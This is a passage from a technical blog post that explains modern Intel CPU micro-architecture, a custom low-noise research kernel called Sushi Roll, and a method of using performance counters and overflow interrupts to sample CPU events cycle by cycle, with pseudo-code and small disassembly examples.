We’ll go a lot more into detail about what everything in this graph means later in the blog, but here’s a simple example of just some of the data we can collect:

Example uarch activity Example cycle-by-cycle profiling of the Kaby Lake micro-architecture, warning: log-scale y-axis

Agenda

This is a relatively long blog and will be split into 4 major sections.

  • The gears that turn in your CPU: A high-level explanation of modern Intel micro-architectures
  • Sushi Roll: The design of the low-noise research kernel
  • Cycle-by-cycle micro-architectural introspection: A unique usage of performance counters to observe cycle-by-cycle micro-architectural behaviors
  • Results: Putting the pieces together and making graphs of cool micro-architectural behavior

Why?

In the past year I’ve spent a decent amount of time doing CPU vulnerability research. I’ve written proof-of-concept exploits for nearly every CPU vulnerability, from many attacker perspectives (user leaking kernel, user/kernel leaking hypervisor, guest leaking other guest, etc). These exploits allowed us to provide developers and researchers with real-world attacks to verify mitigations.

CPU research happens to be an overlap of my two primary research interests: vulnerability research and high-performance kernel development. I joined Microsoft in the early winter of 2017 and this lined up pretty closely with the public release of the Meltdown and Spectre CPU attacks. As I didn’t yet have much on my plate, the idea was floated that I could look into some of the CPU vulnerabilities. I got pretty lucky with this timing, as I ended up really enjoying the work and ended up sinking most of my free time into it.

My workflow for research often starts with writing some custom tools for measuring and analysis of a given target. Whether the target is a web browser, PDF parser, remote attack surface, or a CPU, I’ve often found that the best thing you can do is just make something new. Try out some new attack surface, write a targeted fuzzer for a specific feature, etc. Doing something new doesn’t have to be better or more difficult than something that was done before, as often there are completely unexplored surfaces out there. My specialty is introspection. I find unique ways to measure behaviors, which then fuels the idea pool for code auditing or fuzzer development.

This leads to an interesting situation in CPU research… it’s largely blind. Lots of the current CPU research is done based on writing snippets of code and reviewing the overall side-effects of it (via cache timing, performance counters, etc). These overall side-effects may also include noise from other processor activity, from the OS task switching processes, other cores changing the MESI-state of cache lines, etc. I happened to already have a low-noise no-shared-memory research kernel that I developed for vectorized emulation on Xeon Phis! This lead to a really good starting point for throwing in some performance counters and measuring CPU behaviors… and the results were a bit better than expected.

TL;DR: I enjoy writing tools to measure things, so I wrote a tool to measure undefined CPU behavior.


The gears that turn in your CPU

Feel free to skip this section entirely if you’re familiar with modern processor architecture

Your modern Intel CPU is a fairly complex beast when you care about every technical detail, but lets look at it from a higher level. Here’s what the micro-architecture (uArch) looks like in a modern Intel Skylake processor.

Skylake diagram Skylake uArch diagram, Diagram from WikiChip

There are 3 main components: The front end, which converts complex x86 instructions into groups of micro-operations. The execution engine, which executes the micro-operations. And the memory subsystem, which makes sure that the processor is able to get streams of instructions and data.


Front End

The front end covers almost everything related to figuring out which micro-operations (uops) need to be dispatched to the execution engine in order to accomplish a task. The execution engine on a modern Intel processor does not directly execute x86 instructions, rather these instructions are converted to these micro-operations which are fixed in size and specific to the processor micro-architecture.

Instruction fetch and cache

There’s a lot that happens prior to the actual execution of an instruction. First, the memory containing the instruction is read into the L1 instruction cache, ideally brought in from the L2 cache as to minimize delay. At this point the instruction is still a macro-op (a variable-length x86 instruction), which is quite a pain to work with. The processor still doesn’t know how large the instruction is, so during pre-decode the processor will do an initial length decode to determine the instruction boundaries.

At this point the instruction has been chopped up and is ready for the instruction queue!

Instruction Queue and Macro Fusion

Instructions that come in for execution might be quite simple, and could potentially be “fused” into a complex operation. This stage is not publicly documented, but we know that a very common fusion is combining compare instructions with conditional branches. This allows a common instruction pattern like:

cmp rax, 5
jne .offset

To be combined into a single macro-op with the same semantics. This complex fused operation now only takes up one slot in many parts of the CPU pipeline, rather than two, freeing up more resources to other operations.

Decode

Instruction decode is where the x86 macro-ops get converted into micro-ops. These micro-ops vary heavily by uArch, and allow Intel to regularly change fundamentals in their processors without affecting backwards compatibility with the x86 architecture. There’s a lot of magic that happens in the decoder, but mostly what matters is that the variable-length macro-ops get converted into the fixed-length micro-ops. There are multiple ways that this conversion happens. Instructions might directly convert to uops, and this is the common path for most x86 instructions. However, some instructions, or even processor conditions, may cause something called microcode to get executed.

Microcode

Some instructions in x86 trigger microcode to be used. Microcode is effectively a tiny collection of uops which will be executed on certain conditions. Think of this like a C/C++ macro, where you can have a one-liner for something that expands to much more. When an operation does something that requires microcode, the microcode ROM is accessed and the uops it specifies are placed into the pipeline. These are often complex operations, like switching operating modes, reading/writing internal CPU registers, etc. This microcode ROM also gives Intel an opportunity to make changes to instruction behaviors entirely with a microcode patch.

uop Cache

There’s also a uop cache which allows previously decoded instructions to skip the entire pre-decode and decode process. Like standard memory caching, this provides a huge speedup and dramatically reduces bottlenecks in the front-end.

Allocation Queue

The allocation queue is responsible for holding a bunch of uops which need to be executed. These are then fed to the execution engine when the execution engine has resources available to execute them.


Execution engine

The execution engine does exactly what you would expect: it executes things. But at this stage your processor starts moving your instructions around to speed things up.

Things start to get a bit complex at this point, click for details!

Renaming / Allocating / Retirement

Resources need to be allocated for certain operations. There are a lot more registers in the processor than the standard x86 registers. These registers are allocated out for temporary operations, and often mapped onto their corresponding x86 registers.

There are a lot of optimizations the CPU can do at this stage. It can eliminate register moves by aliasing registers (such that two x86 registers “point to” the same internal register). It can remove known zeroing instructions (like xor with self, or and with zero) from the pipeline, and just zero the registers directly. These optimizations are frequently improved each generation.

Finally, when instructions have completed successfully, they are retired. This retirement commits the internal micro-architectural state back out to the x86 architectural state. It’s also when memory operations become visible to other CPUs.

Re-ordering

uOP re-ordering is important to modern CPU performance. Future instructions which do not depend on the current instruction, could execute while waiting for the results of the current one.

For example:

mov rax, [rax]
add rbx, rcx

In this short example we see that we perform a 64-bit load from the address in rax and store it back into rax. Memory operations can be quite expensive, ranging from 4 cycles for a L1 cache hit, to 250 cycles and beyond for an off-processor memory access.

The processor is able to realize that the add rbx, rcx instruction does not need to “wait” for the result of the load, and can send off the add uop for execution while waiting for the load to complete.

This is where things can start to get weird. The processor starts to perform operations in a different order than what you told it to. The processor then holds the results and makes sure they “appear” to other cores in the correct order, as x86 is a strongly-ordered architecture. Other architectures like ARM are typically weakly-ordered, and it’s up to the developer to insert fences in the instruction stream to tell the processor the specific order operations need to complete in. This ordering is not an issue on a single core, but it may affect the way another core observes the memory transactions you perform.

For example:

Core 0 executes the following:

mov [shared_memory.pointer], rax ; Store the pointer in `rax` to shared memory
mov [shared_memory.owned],   0   ; Mark that we no longer own the shared memory

Core 1 executes the following:

.try_again:
    cmp [shared_memory.owned], 0 ; Check if someone owns this memory
    jne .try_again               ; Someone owns this memory, wait a bit longer

    mov rax, [shared_memory.pointer] ; Get the pointer
    mov rax, [rax]                   ; Read from the pointer

On x86 this is safe, as all aligned loads and stores are atomic, and are commit in a way that they appear in-order to all other processors. On something like ARM the owned value could be written to prior to pointer being written, allowing core 1 to use a stale/invalid pointer.

Execution Units

Finally we got to an easy part: the execution units. This is the silicon that is responsible for actually performing maths, loads, and stores. The core has multiple copies of this hardware logic for some of the common operations, which allows the same operation to be performed in parallel on separate data. For example, an add can be performed on 4 different execution units.

For things like loads, there are 2 load ports (port 2 and port 3), this allows 2 independent loads to be executed per cycle. Stores on the other hand, only have one port (port 4), and thus the core can only perform one store per cycle.


Memory subsystem

The memory subsystem on Intel is pretty complex, but we’re only going to go into the basics.

Caches

Caches are critical to modern CPU performance. RAM latency is so high (150-250 cycles) that a CPU is largely unusable without a cache. For example, if a modern x86 processor at 2.2 GHz had all caches disabled, it would never be able to execute more than ~15 million instructions per second. That’s as slow as an Intel 80486 from 1991.

When working on my first hypervisor I actually disabled all caching by mistake, and Windows took multiple hours to boot. It’s pretty incredible how important caches are.

For x86 there are typically 3 levels of cache: A level 1 cache, which is extremely fast, but small: 4 cycles latency. Followed by a level 2 cache, which is much larger, but still quite small: 14 cycles latency. Finally there’s the last-level-cache (LLC, typically the L3 cache), this is quite large, but has a higher latency: ~60 cycles.

The L1 and L2 caches are present in each core, however, the L3 cache is shared between multiple cores.

Translation Lookaside Buffers (TLBs)

In modern CPUs, applications almost never interface with physical memory directly. Rather they go through address translation to convert virtual addresses to physical addresses. This allows contiguous virtual memory regions to map to fragmented physical memory. Performing this translation requires 4 memory accesses (on 64-bit 4-level paging), and is quite expensive. Thus the CPU caches recently translated addresses such that it can skip this translation process during memory operations.

It is up to the OS to tell the CPU when to flush these TLBs via an invalidate page, invlpg instruction. If the OS doesn’t correctly invlpg memory when mappings change, it’s possible to use stale translation information.

Line fill buffers

While a load is pending, and not yet present in L1 cache, the data lives in a line fill buffer. The line fill buffers live between L2 cache and your L1 cache. When a memory access misses L1 cache, a line fill buffer entry is allocated, and once the load completes, the LFB is copied into the L1 cache and the LFB entry is discarded.

Store buffer

Store buffers are similar to line fill buffers. While waiting for resources to be available for a store to complete, it is placed into a store buffer. This allows for up to 56 stores (on Skylake) to be queued up, even if all other aspects of the memory subsystem are currently busy, or stores are not ready to be retired.

Further, loads which access memory will query the store buffers to potentially bypass the cache. If a read occurs on a recently stored location, the read could directly be filled from the store buffers. This is called store forwarding.

Load buffers

Similar to store buffers, load buffers are used for pending load uops. This sits between your execution units and L1 cache. This can hold up to 72 entries on Skylake.

CPU architecture summary and more info

That was a pretty high level introduction to many of the aspects of modern Intel CPU architecture. Every component of this diagram could have an entire blog written on it. Intel Manuals, WikiChip, Agner Fog’s CPU documentation, and many more, provide a more thorough documentation of Intel micro-architecture.


Sushi Roll

Sushi Roll is one of my favorite kernels! It wasn’t originally designed for CPU introspection, but it had some neat features which made it much more suitable for CPU research than my other kernels. We’ll talk a bit about why this kernel exists, and then talk about why it quickly became my go-to kernel for CPU research.

Kernel mascot: Squishble Sushi Roll

A primer on Knights Landing

Sushi Roll was originally designed for my Vectorized Emulation work. Vectorized emulation was designed for the Intel Xeon Phi (Knights Landing), which is a pretty strange architecture. Even though it’s fully-featured traditional x86, standard software will “just work” on it, it is quite slow per individual thread. First of all, the clock rates are ~1.3 GHz, so there alone it’s about 2-3x slower than a “standard” x86 processor. Even further, it has fewer CPU resources for re-ordering and instruction decode. All-in-all the CPU is about 10x slower when running a single-threaded application compared to a “standard” 3 GHz modern Intel CPU. There’s also no L3 cache, so memory accesses can become much more expensive.

On top of these simple performance issues, there are more complex issues due to 4-way hyperthreading. Knights Landing was designed to be 4-way hyperthreaded (4 threads per core) to alleviate some of the performance losses of the limited instruction decode and caching. This allows threads to “block” on memory accesses while other threads with pending computations use the execution units. This 4-way hyperthreading, combined with 64-core processors, leads to 256 hardware threads showing up to your OS as cores.

Migrating processes and resources between these threads can be catastrophically slow. Standard shared-memory models also start to fall apart at this level of scaling (without specialized tuning). For example: If all 256 threads are hammering the same memory by performing an atomic increment (lock inc instruction), each individual increment will start to cost over 10,000 cycles! This is enough time for a single core on the Xeon Phi to do 640,000 single-precision floating point operations… just from a single increment! While most software treats atomics as “free locks”, they start to cause some serious cache-coherency pollution when scaled out this wide.

Obviously with some careful development you can mitigate these issues by decreasing the frequency of shared memory accesses. But perhaps we can develop a kernel that fundamentally disallows this behavior, preventing a developer from ever starting to go down the wrong path!

The original intent of Sushi Roll

Sushi Roll was designed from the start to be a massively parallel message-passing based kernel. The most notable feature of Sushi Roll is that there is no mutable shared memory allowed (a tiny exception made for the core IPC mechanism). This means that if you ever want to share information with another processor, you must pass that information via IPC. Shared immutable memory however, is allowed, as this doesn’t cause cache coherency traffic.

This design also meant that a lock never needed to be held, even atomic-level locks using the lock prefix. Rather than using locks, a specific core would own a hardware resource. For example, core #0 may own the network card, or a specific queue on the network card. Instead of requesting exclusive access to the NIC by obtaining a lock, you would send a message to core #0, indicating that you want to send a packet. All of the processing of these packets is done by the sender, thus the data is already formatted in a way that can be directly dropped into the NIC ring buffers. This made the owner of a hardware resource simply a mediator, reducing the latency to that resource.

While this makes the internals of the kernel a bit more complex, the programming model that a developer sees is still a standard send()/recv() model. By forcing message-passing, this ensured that all software written for this kernel could be scaled between multiple machines with no modification. On a single computer there is a fast, low-latency IPC mechanism that leverages some of the abilities to share memory (by transferring ownership of physical memory to the receiver). If the target for a message resided on another computer on the network, then the message would be serialized in a way that could be sent over the network. This complexity is yet again hidden from the developer, which allows for one program to be made that is scaled out without any extra effort.

No interrupts, no timers, no software threads, no processes

Sushi Roll follows a similar model to most of my other kernels. It has no interrupts, no timers, no software threads, and no processes. These are typically required for traditional operating systems, as to provide a user experience with multiple processes and users. However, my kernels are always designed for one purpose. This means the kernel boots up, and just does a given task on all cores (sometimes with one or two cores having a “special” responsibility).

By removing all of these external events, the CPU behaves a lot more deterministically. Sushi Roll goes the extra mile here, as it further reduces CPU noise by not having cores sharing memory and causing unexpected cache evictions or coherency traffic.

Soft Reboots

Similar to kexec on Linux, my kernels always support soft rebooting. This allows the old kernel (even a double faulted/corrupted kernel) to be replaced by a new kernel. This process takes about 200-300ms to tear down the old kernel, download the new one over PXE, and run the new one. This makes it feasible to have such a specialized kernel without processes, since I can just change the code of the kernel and boot up the new one in under a second. Rapid prototyping is crucial to fast development, and without this feature this kernel would be unusable.

Sushi Roll conclusion

Sushi Roll ended up being the perfect kernel for CPU introspection. It’s the lowest noise kernel I’ve ever developed, and it happened to also be my flagship kernel right as Spectre and Meltdown came out. By not having processes, threads, or interrupts, the CPU behaves much more deterministically than in a traditional OS.


Performance Counters

Before we get into how we got cycle-by-cycle micro-architectural data, we must learn a little bit about the performance monitoring available on Intel CPUs! This information can be explored in depth in the Intel System Developer Manual Volume 3b (note that the combined volume 3 manual doesn’t go into as much detail as the specific sub-volume manual).

Performance Counter Manual

Intel CPUs have a performance monitoring subsystem relying largely on a set of model-specific-registers (MSRs). These MSRs can be configured to track certain architectural events, typically by counting them. These counters are formally “performance monitoring counters”, often referred to as “performance counters” or PMCs.

These PMCs vary by micro-architecture. However, over time Intel has committed to offering a small subset of counters between multiple micro-architectures. These are called architectural performance counters. The version of these architectural performance counters are found in CPUID.0AH:EAX[7:0]. As of this writing there are 4 versions of architectural performance monitoring. The latest version provides a decent amount of generic information useful to general-purpose optimization. However, for a specific micro-architecture, the possibilities of performance events to track are almost limitless.

Basic usage of performance counters

To use the performance counters on Intel there are a few steps involved. First you must find a performance event you want to monitor. This information is found in per-micro-architecture tables found in the Intel Manual Volume 3b “Performance-Monitoring Events” chapter.

For example, here’s a very small selection of Skylake-specific performance events:

Skylake Events

Intel performance counters largely rely on two banks of MSRs. The performance event selection MSRs, where the different events are programmed using the umask and event numbers from the table above. And the performance counter MSRs which hold the counts themselves.

The performance event selection MSRs (IA32_PERFEVTSELx) start at address 0x186 and span a contiguous MSR region. The layout of these event selection MSRs varies slightly by micro-architecture. The number of counters available varies by CPU and is dynamically checked by reading CPUID.0AH:EAX[15:8]. The performance counter MSRs (IA32_PMCx) start at address 0xc1 and also span a contiguous MSR region. The counters have an micro-architecture-specific number of bits they support, found in CPUID.0AH:EAX[23:16]. Reading and writing these MSRs is done via the rdmsr and wrmsr instructions respectively.

Typically modern Intel processors support 4 PMCs, and thus will have 4 event selection MSRs (0x186, 0x187, 0x188, and 0x189) and 4 counter MSRs (0xc1, 0xc2, 0xc3, and 0xc4). Most processors have 48-bit performance counters. It’s important to dynamically detect this information!

Here’s what the IA32_PERFEVTSELx MSR looks like for PMC version 3:

Performance Event Selection

Field Meaning
Event Select Holds the event number from the event tables, for the event you are interested in
Unit Mask Holds the umask value from the event tables, for the event you are interested in
USR If set, this counter counts during user-land code execution (ring level != 0)
OS If set, this counter counts during OS execution (ring level == 0)
E If set, enables edge detection of the event being tracked. Counts de-asserted to asserted transitions, which allows for timing of events
PC Pin control allows for some hardware monitoring of events, like… the actual pins on the CPU
INT Generate an interrupt through the APIC if an overflow occurs of the (usually 48-bit) counter
ANY Increment the performance event when any hardware thread on a given physical core triggers the event, otherwise it only increments for a single logical thread
EN Enable the counter
INV Invert the counter mask, which changes the meaning of the CMASK field from a >= comparison (if this bit is 0), to a < comparison (if this bit is 1)
CMASK If non-zero, the CPU only increments the performance counter when the event is triggered >= (or < if INV is set) CMASK times in a single cycle. This is useful for filtering events to more specific situations. If zero, this has no effect and the counter is incremented for each event

And that’s about it! Find the right event you want to track in your specific micro-architecture’s table, program it in one of the IA32_PERFEVTSELx registers with the correct event number and umask, set the USR and/or OS bits depending on what type of code you want to track, and set the E bit to enable it! Now the corresponding IA32_PMCx counter will be incrementing every time that event occurs!

Reading the PMC counts faster

Instead of performing a rdmsr instruction to read the IA32_PMCx values, instead a rdpmc instruction can be used. This instruction is optimized to be a little bit faster and supports a “fast read mode” if ecx[31] is set to 1. This is typically how you’d read the performance counters.

Performance Counters version 2

In the second version of performance counters, Intel added a bunch of new features.

Intel added some fixed performance counters (IA32_FIXED_CTR0 through IA32_FIXED_CTR2, starting at address 0x309) which are not programmable. These are configured by IA32_FIXED_CTR_CTRL at address 0x38d. Unlike normal PMCs, these cannot be programmed to count any event. Rather the controls for these only allows the selection of which CPU ring level they increment at (or none to disable it), and whether or not they trigger an interrupt on overflow. No other control is provided for these.

Fixed Performance Counter MSR Meaning
IA32_FIXED_CTR0 0x309 Counts number of retired instructions
IA32_FIXED_CTR1 0x30a Counts number of core cycles while the processor is not halted
IA32_FIXED_CTR2 0x30b Counts number of timestamp counts (TSC) while the processor is not halted

These are then enabled and disabled by:

Fixed Counter Control

The second version of performance counters also added 3 new MSRs that allow “bulk management” of performance counters. Rather than checking the status and enabling/disabling each performance counter individually, Intel added 3 global control MSRs. These are IA32_PERF_GLOBAL_CTRL (address 0x38f) which allows enabling and disabling performance counters in bulk. IA32_PERF_GLOBAL_STATUS (address 0x38e) which allows checking the overflow status of all performance counters in one rdmsr. And IA32_PERF_GLOBAL_OVF_CTRL (address 0x390) which allows for resetting the overflow status of all performance counters in one wrmsr. Since rdmsr and wrmsr are serializing instructions, these can be quite expensive and being able to reduce the amount of them is important!

Global control (simple, allows masking of individual counters from one MSR):

Performance Global Control

Status (tracks overflows of various counters, with a global condition changed tracker):

Performance Global Status

Status control (writing a 1 to any of these bits clears the corresponding bit in IA32_PERF_GLOBAL_STATUS):

Performance Global Status

Finally, Intel added 2 bits to the existing IA32_DEBUGCTL MSR (address 0x1d9). These 2 bits Freeze_LBR_On_PMI (bit 11) and Freeze_PerfMon_On_PMI (bit 12) allow freezing of last branch recording (LBR) and performance monitoring on performance monitor interrupts (often due to overflows). These are designed to reduce the measurement of the interrupt itself when an overflow condition occurs.

Performance Counters version 3

Performance counters version 3 was pretty simple. Intel added the ANY bit to IA32_PERFEVTSELx and IA32_FIXED_CTR_CTRL to allow tracking of performance events on any thread on a physical core. Further, the performance counters went from a fixed number of 2 counters, to a variable amount of counters. This resulted in more bits being added to the global status, overflow, and overflow control MSRs, to control the corresponding counters.

Performance Global Status

Performance Counters version 4

Performance counters version 4 is pretty complex in detail, but ultimately it’s fairly simple. Intel renamed some of the MSRs (for example IA32_PERF_GLOBAL_OVF_CTRL became IA32_PERF_GLOBAL_STATUS_RESET). Intel also added a new MSR IA32_PERF_GLOBAL_STATUS_SET (address 0x391) which instead of clearing the bits in IA32_PERF_GLOBAL_STATUS, allows for setting of the bits.

Further, the freezing behavior enabled by IA32_DEBUGCTL.Freeze_LBR_On_PMI and IA32_DEBUGCTL.Freeze_PerfMon_On_PMI was streamlined to have a single bit which tracks the “freeze” state of the PMCs, rather than clearing the corresponding bits in the IA32_PERF_GLOBAL_CTRL MSR. This change is awesome as it reduces the cost of freezing and unfreezing the performance monitoring unit (PMU), but it’s actually a breaking change from previous versions of performance counters.

Finally, they added a mechanism to allow sharing of performance counters between multiple users. This is not really relevant to anything we’re going to talk about, so we won’t go into details.

Conclusion

Performance counters started off pretty simple, but Intel added more and more features over time. However, these “new” features are critical to what we’re about to do next :)


Cycle-by-cycle micro-architectural sampling

Now that we’ve gotten some prerequisites out of the way, lets talk about the main course of this blog: A creative use of performance counters to get cycle-by-cycle micro-architectural information out of Intel CPUs!

It’s important to note that this technique is meant to assist in finding and learning things about CPUs. The data it generates is not particularly easy to interpret or work with, and there are many pitfalls to be aware of!

The Goal

Performance counters are incredibly useful in categorizing micro-architectural behavior on an Intel CPU. However, these counters are often used on a block or whole program entirely, and viewed as a single data point over the whole run. For example, one might use performance counters to track the number of times there’s a cache miss in their program under test. This will give a single number as an output, giving an indication of how many times the cache was missed, but it doesn’t help much in telling you when they occurred. By some binary searching (or creative use of counter overflows) you can get a general idea of when the event occurred, but I wanted more information.

More specifically, I wanted to view micro-architectural data on a graph, where the x-axis was in cycles. This would allow me to see (with cycle-level granularity) when certain events happened in the CPU.

The Idea

We’ve set a pretty lofty goal for ourselves. We effectively want to link two performance counters with each other. In this case we want to use an arbitrary performance counter for some event we’re interested in, and we want to link it to a performance counter tracking the number of cycles elapsed. However, there doesn’t seem to be a direct way to perform this linking.

We know that we can have multiple performance counters, so we can configure one to count a given event, and another to count cycles. However, in this case we’re not able to capture information at each cycle, as we have no way of reading these counters together. We also cannot stop the counters ourselves, as stopping the counters requires injecting a wrmsr instruction which cannot be done on an arbitrary cycle boundary, and definitely cannot be done during speculation.

But there’s a small little trick we can use. We can stop multiple performance counters at the same time by using the IA32_DEBUGCTL.Freeze_PerfMon_On_PMI feature. When a counter ends up overflowing, an interrupt occurs (if configured as such). When this overflow occurs, the freeze bit in IA32_PERF_GLOBAL_STATUS is set (version 4 PMCs specific feature), causing all performance counters to stop.

This means that if we can cause an overflow on each cycle boundary, we could potentially capture the time and the event we’re interested in at the same time. Doing this isn’t too difficult either, we can simply pre-program the performance counter value IA32_PMCx to N away from overflow. In our specific case, we’re dealing with a 48-bit performance counter. So in theory if we program PMC0 to count number of cycles, set the counter to 2^48 - N where N is >= 1, we can get an interrupt, and thus an “atomic” disabling of performance counters after N cycles.

If we set up a deterministic enough execution environment, we can run the same code over and over, while adjusting N to sample the code at a different cycle count.

This relies on a lot of assumptions. We’re assuming that the freeze bit ends up disabling both performance counters at the same time (“atomically”), we’re assuming we can cause this interrupt on an arbitrary cycle boundary (even during multi-cycle instructions), and we also are assuming that we can execute code in a clean enough environment where we can do multiple runs measuring different cycle offsets.

So… lets try it!

The Implementation

A simple pseudo-code implementation of this sampling method looks as such:

/// Number of times we want to sample each data point. This allows us to look
/// for the minimum, maximum, and average values. This also gives us a way to
/// verify that the environment we're in is deterministic and the results are
/// sane. If minimum == maximum over many samples, it's safe to say we have a
/// very clear picture of what is happening.
const NUM_SAMPLES: u64 = 1000;

/// Maximum number of cycles to sample on the x-axis. This limits the sampling
/// space.
const MAX_CYCLES: u64 = 1000;

// Program the APIC to map the performance counter overflow interrupts to a
// stub assembly routine which simply `iret`s out
configure_pmc_interrupts_in_apic();

// Configure performance counters to freeze on interrupts
perf_freeze_on_overflow();

// Iterate through each performance counter we want to gather data on
for perf_counter in performance_counters_of_interest {
    // Disable and reset all performance counters individually
    // Clearing their counts to 0, and clearing their event select MSRs to 0
    disable_all_perf_counters();

    // Disable performance counters globally by setting IA32_PERF_GLOBAL_CTRL
    // to 0
    disable_perf_globally();

    // Enable a performance counter (lets say PMC0) to track the `perf_counter`
    // we're interested in. Note that this doesn't start the counter yet, as we
    // still have the counters globally disabled.
    enable_perf_counter(perf_counter);

    // Go through each number of samples we want to collect for this performance
    // counter... for each cycle offset.
    for _ in 0..NUM_SAMPLES {
        // Go through each cycle we want to observe
        for cycle_offset in 1..=MAX_CYCLES {
            // Clear out the performance counter values: IA32_PMCx fields
            clear_perf_counters();

            // Program fixed counter #1 (un-halted cycle counter) to trigger
            // an interrupt on overflow. This will cause an interrupt, which
            // will then cause a freeze of all PMCs.
            program_fixed1_interrupt_on_overflow();

            // Program the fixed counter #1 (un-halted cycle counter) to
            // `cycles` prior to overflowing
            set_fixed1_value((1 << 48) - cycle_offset);

            // Do some pre-test environment setup. This is important to make
            // sure we can sample the code under test multiple times and get
            // the same result. Here is where you'd be flushing cache lines,
            // maybe doing a `wbinvd`, etc.
            set_up_environment();

            // Enable both the fixed #1 cycle counter and the PMC0 performance
            // counter (tracking the stat we're interested in) at the same time,
            // by using IA32_PERF_GLOBAL_CTRL. This is serializing so you don't
            // have to worry about re-ordering across this boundary.
            enable_perf_globally();

            asm!(r#"

                asm
                under
                test
                here

            "# :::: "volatile");

            // Clear IA32_PERF_GLOBAL_CTRL to 0 to stop counters
            disable_perf_globally();

            // If fixed PMC #1 has not overflowed, then we didn't capture
            // relevant data. This only can happen if we tried to sample a
            // cycle which happens after the assembly under test executed.
            if fixed1_pmc_overflowed() == false {
                continue;
            }

            // At this point we can do whatever we want as the performance
            // counters have been turned off by the interrupt and we should have
            // relevant data in both :)

            // Get the count from fixed #1 PMC. It's important that we grab this
            // as interrupts are not deterministic, and thus it's possible we
            // "overshoot" the target
            let fixed1_count = read_fixed1_counter();

            // Add the distance-from-overflow we initially programmed into the
            // fixed #1 counter, with the current value of the fixed #1 counter
            // to get the total number of cycles which have elapsed during
            // our example.
            let total_cycles = cycle_offset + fixed1_count;

            // Read the actual count from the performance counter we were using.
            // In this case we were using PMC #0 to track our event of interest.
            let value = read_pmc0();

            // Somehow log that performance counter `perf_counter` had a value
            // `value` `total_cycles` into execution
            log_result(perf_counter, value, total_cycles);
        }
    }
}

Simple results

So? Does it work? Let’s try with a simple example of code that just does a few “nops” by adjusting the stack a few times:

add rsp, 8
sub rsp, 8
add rsp, 8
sub rsp, 8

Simple Sample

So how do we read this graph? Well, the x-axis is simple. It’s the time, in cycles, of execution. The y-axis is the number of events (which varies based on the key). In this case we’re only graphing the number of instructions retired (successfully executed).

So does this look right? Hmmm…. we ran 4 instructions, why did we see 8 retire?

Well in this case there’s a little bit of “extra” noise introduced by the harnessing around the code under test. Let’s zoom out from our code and look at what actually executes during our test:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f ; IA32_PERF_GLOBAL_CTRL
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

; Here's our code under test :D
00000011  4883C408          add rsp,byte +0x8
00000015  4883EC08          sub rsp,byte +0x8
00000019  4883C408          add rsp,byte +0x8
0000001D  4883EC08          sub rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000021  B98F030000        mov ecx,0x38f
00000026  31C0              xor eax,eax
00000028  31D2              xor edx,edx
0000002A  0F30              wrmsr

So if we take another look at the graph, we see there are 8 instructions that retired. The very first instruction we see retire (at cycle=11), is actually the wrmsr we used to enable the counters. This makes sense, at some point prior to retirement of the wrmsr instruction the counters must be enabled internally somewhere in the CPU. So we actually get to see this instruction retire!

Then we see 7 more instructions retire to give us a total of 8… hmm. Well, we have 4 of our add and sub mix that we executed, so that brings us down to 3 more remaining “unknown” instructions.

These 3 remaining instructions are explained by the code which disables the performance counter after our test code has executed. We have 1 mov, and 2 xor instructions which retire prior to the wrmsr which disables the counters. It makes sense that we never see the final wrmsr retire as the counters will be turned off in the CPU prior to the wrmsr instruction retiring!

Wala! It all makes sense. We now have a great view into what the CPU did in terms of retirement for this code in question. Everything we saw lined up with what actually executed, always good to see.

A bit more advanced result

Lets add a few more performance counters to track. In this case lets track the number of instructions retired, as well as the number of micro-ops dispatched to port 4 (the store port). This will give us the number of stores which occurred during test.

Code to test (just a few writes to the stack):

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  4883EC08          sub rsp,byte +0x8
00000015  48C7042400000000  mov qword [rsp],0x0
0000001D  4883C408          add rsp,byte +0x8
00000021  4883EC08          sub rsp,byte +0x8
00000025  48C7042400000000  mov qword [rsp],0x0
0000002D  4883C408          add rsp,byte +0x8

; And finally we disable all counters by setting IA32_PERF_GLOBAL_CTRL to 0
00000031  B98F030000        mov ecx,0x38f
00000036  31C0              xor eax,eax
00000038  31D2              xor edx,edx
0000003A  0F30              wrmsr

Store Sample

This one is fun. We simply make room on the stack (sub rsp), write a 0 to the stack (mov [rsp]), and then restore the stack (add rsp), and then do it all again one more time.

Here we added another plot to the graph, Port 4, which is the store uOP port on the CPU. We also track the number of instructions retired, as we did in the first example. Here we can see instructions retired matches what we would expect. We see 10 retirements, 1 from the first wrmsr enabling the performance counters, 6 from our own code under test, and 3 more from the disabling of the performance counters.

This time we’re able to see where the stores occur, and indeed, 2 stores do occur. We see a store happen at cycle=28 and cycle=29. Interestingly we see the stores are back-to-back, even though there’s a bit of code between them. We’re probably observing some re-ordering! Later in the graph (cycle=39), we observe that 4 instructions get retired in a single cycle! How cool is that?!

How deep can we go?

Using the exact same store example from above, we can enable even more performance counters. This gives us an even more detailed view of different parts of the micro-architectural state.

Busy Sample

In this case we’re tracking all uOP port activity, machine clears (when the CPU resets itself after speculation), offcore requests (when messages get sent offcore, typically to access physical memory), instructions retired, and branches retired. In theory we can measure any possible performance counter available on our micro-architecture on a time domain. This gives us the ability to see almost anything that is happening on the CPU!

Noise…

In all of the examples we’ve looked at, none of the data points have visible error bars. In these graphs the error bars represent the minimum value, mean value, and maximum value observed for a given data point. Since we’re running the same code over and over, and sampling it at different execution times, it’s very possible for “random” noise to interfere with results. Let’s look at a bit more noisy example:

; Right before test, we end up enabling all performance counters at once by
; writing 0x2_0000_000f to IA32_PERF_GLOBAL_CTRL. This enables all 4
; programmable counters at the same time as enabling fixed PMC #1 (cycle count)
00000000  B98F030000        mov ecx,0x38f
00000005  B80F000000        mov eax,0xf
0000000A  BA02000000        mov edx,0x2
0000000F  0F30              wrmsr

00000011  48C7042500000000  mov qword [0x0],0x0
         -00000000
0000001D  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000029  48C7042500000000  mov qword [0x0],0x0
         -00000000
00000035  48C7042500000000  mov qword [0x0],0x0
         -00000000

